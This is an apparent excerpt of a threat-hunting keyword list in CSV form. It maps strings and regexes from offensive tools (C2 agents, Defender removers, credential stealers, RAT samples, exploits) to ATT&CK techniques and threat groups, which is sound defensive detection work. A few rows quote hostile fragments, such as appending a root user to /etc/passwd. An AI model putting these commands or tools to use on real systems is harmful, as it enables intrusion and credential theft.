"*/zsh_executor/*.go*",".{0,1000}\/zsh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","12828"
"*/zwjjustdoit/cve-2022-23131*",".{0,1000}\/zwjjustdoit\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","N/A","1","1","4","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z","12829"
"*/zzz_exploit.py*",".{0,1000}\/zzz_exploit\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","12830"
"*:  Defeat-Defender-V1.2.0*",".{0,1000}\:\s\sDefeat\-Defender\-V1\.2\.0.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","12831"
"*: Running Privilege Escalation Checks ===*",".{0,1000}\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","12834"
"*://wstunnel.server.com*",".{0,1000}\:\/\/wstunnel\.server\.com.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12836"
"*:: [BAD R.A.T.]-Company*",".{0,1000}\:\:\s\[BAD\sR\.A\.T\.\]\-Company.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12837"
"*:: Dos-Gui by Mr Hawk*",".{0,1000}\:\:\sDos\-Gui\sby\sMr\sHawk.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12838"
"*:: RedBackdoorer*",".{0,1000}\:\:\sRedBackdoorer.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","12839"
"*:: RedWatermarker*",".{0,1000}\:\:\sRedWatermarker.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","12840"
"*:: Remove (s)AINT folder*",".{0,1000}\:\:\sRemove\s\(s\)AINT\sfolder.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","12841"
"*::Info2FTP by Mr Hawk*",".{0,1000}\:\:Info2FTP\sby\sMr\sHawk.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12845"
"*-:[GreenwooD]:- WinX Shell*",".{0,1000}\-\:\[GreenwooD\]\:\-\sWinX\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","12846"
"*:\ProgramData\demo.dll*",".{0,1000}\:\\ProgramData\\demo\.dll.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","12848"
"*:\ProgramData\RecoverySystem\recoveryWindows.zip*",".{0,1000}\:\\ProgramData\\RecoverySystem\\recoveryWindows\.zip.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12849"
"*:\ProgramData\SystemData\igfxCUIService.exe*",".{0,1000}\:\\ProgramData\\SystemData\\igfxCUIService\.exe.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12850"
"*:\ProgramData\SystemData\tempo1.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo1\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12851"
"*:\ProgramData\SystemData\tempo2.txt*",".{0,1000}\:\\ProgramData\\SystemData\\tempo2\.txt.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12852"
"*:\users\public\*.bat*",".{0,1000}\:\\users\\public\\.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12853"
"*:\users\public\*.hta*",".{0,1000}\:\\users\\public\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12854"
"*:\users\public\*.ps1*",".{0,1000}\:\\users\\public\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12855"
"*:\users\public\*.vbs*",".{0,1000}\:\\users\\public\\.{0,1000}\.vbs.{0,1000}","offensive_tool_keyword","_","scripts in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12856"
"*:\Users\Public\Music\*.dll*",".{0,1000}\:\\Users\\Public\\Music\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","12857"
"*:\windows\temp\blah.txt*",".{0,1000}\:\\windows\\temp\\blah\.txt.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","12858"
"*:0:0:root:/root:/bin/bash"" >> /etc/passwd*",".{0,1000}\:0\:0\:root\:\/root\:\/bin\/bash\""\s\>\>\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12859"
"*:'123pentest'*",".{0,1000}\:\'123pentest\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12860"
"*:8070/reverseShellClients*",".{0,1000}\:8070\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","12862"
"*:8080/yara/file*",".{0,1000}\:8080\/yara\/file.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","12864"
"*:8999/Payloads/*",".{0,1000}\:8999\/Payloads\/.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","12865"
"*:9090*/api/v1.0/relays*",".{0,1000}\:9090.{0,1000}\/api\/v1\.0\/relays.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12867"
"*:CreateProcessFromParent((Get-Process ""lsass"").Id*",".{0,1000}\:CreateProcessFromParent\(\(Get\-Process\s\""lsass\""\)\.Id.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","12868"
"*:ddos-udp - started udp flood*",".{0,1000}\:ddos\-udp\s\-\sstarted\sudp\sflood.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12869"
"*?function Invoke-CylanceDisarm*",".{0,1000}\?function\sInvoke\-CylanceDisarm.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","12871"
"*@"" ( _/_   _//   ~b33f""*",".{0,1000}\@\""\s\(\s_\/_\s\s\s_\/\/\s\s\s\~b33f\"".{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","12872"
"*@_logangoins\n@hullabrian*",".{0,1000}\@_logangoins\\n\@hullabrian.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#content","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","12873"
"*@2024 nyxgeek - TrustedSec*",".{0,1000}\@2024\snyxgeek\s\-\sTrustedSec.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","powershell content","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","12874"
"*@author 7etsuo*",".{0,1000}\@author\s7etsuo.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","N/A","6","","N/A","","","","12876"
"*@etc.2miners.com:*",".{0,1000}\@etc\.2miners\.com\:.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","12878"
"*@evilmail.to*",".{0,1000}\@evilmail\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","12879"
"*@mitm_pattern = *",".{0,1000}\@mitm_pattern\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","12880"
"*@mitm_port = *",".{0,1000}\@mitm_port\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","12881"
"*@mitm_servers =*",".{0,1000}\@mitm_servers\s\=.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","12882"
"*@Re@mov@e-@MpTh@re@at*",".{0,1000}\@Re\@mov\@e\-\@MpTh\@re\@at.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","12883"
"*@redpill CS Compiled Executable*",".{0,1000}\@redpill\sCS\sCompiled\sExecutable.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","12884"
"*@set defenderremoverver=*",".{0,1000}\@set\sdefenderremoverver\=.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12885"
"*@WanaDecryptor@.exe*",".{0,1000}\@WanaDecryptor\@\.exe.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","12887"
"*[ + ] Got a packet from the backdoor!*",".{0,1000}\[\s\+\s\]\sGot\sa\spacket\sfrom\sthe\sbackdoor!.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","12888"
"*[ backdoor - Debug ]*",".{0,1000}\[\sbackdoor\s\-\sDebug\s\].{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","12889"
"*[!]    Failed to enumerate Credman:*",".{0,1000}\[!\]\s\s\s\sFailed\sto\senumerate\sCredman\:.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#content","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","12891"
"*[!] Avoid mixing BetterXencrypt with another techniques*",".{0,1000}\[!\]\sAvoid\smixing\sBetterXencrypt\swith\sanother\stechniques.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","12893"
"*[!] Cannot enumerate domain.*",".{0,1000}\[!\]\sCannot\senumerate\sdomain\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#content","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","12894"
"*[!] Can't remove the HWBP-Hook for VirtualAlloc !*",".{0,1000}\[!\]\sCan\'t\sremove\sthe\sHWBP\-Hook\sfor\sVirtualAlloc\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","#content","N/A","10","","N/A","","","","12895"
"*[!] cleaning up all IOCs files to avoid detection!*",".{0,1000}\[!\]\scleaning\sup\sall\sIOCs\sfiles\sto\savoid\sdetection!.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","#content","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","12896"
"*[!] Could not execute query. Could not bind to LDAP://rootDSE.*",".{0,1000}\[!\]\sCould\snot\sexecute\squery\.\sCould\snot\sbind\sto\sLDAP\:\/\/rootDSE\..{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","#content","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","12897"
"*[!] Could not extract useful token from specified Teams database!*",".{0,1000}\[!\]\sCould\snot\sextract\suseful\stoken\sfrom\sspecified\sTeams\sdatabase!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12898"
"*[!] Couldn't capture the user credential hash :*",".{0,1000}\[!\]\sCouldn\'t\scapture\sthe\suser\scredential\shash\s\:.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","12899"
"*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","#content","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","12900"
"*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","12901"
"*[!] Couldn't receive the type2 message from the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\sreceive\sthe\stype2\smessage\sfrom\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","12902"
"*[!] CredBackupCredentials(*",".{0,1000}\[!\]\sCredBackupCredentials\(.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","#content","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","12903"
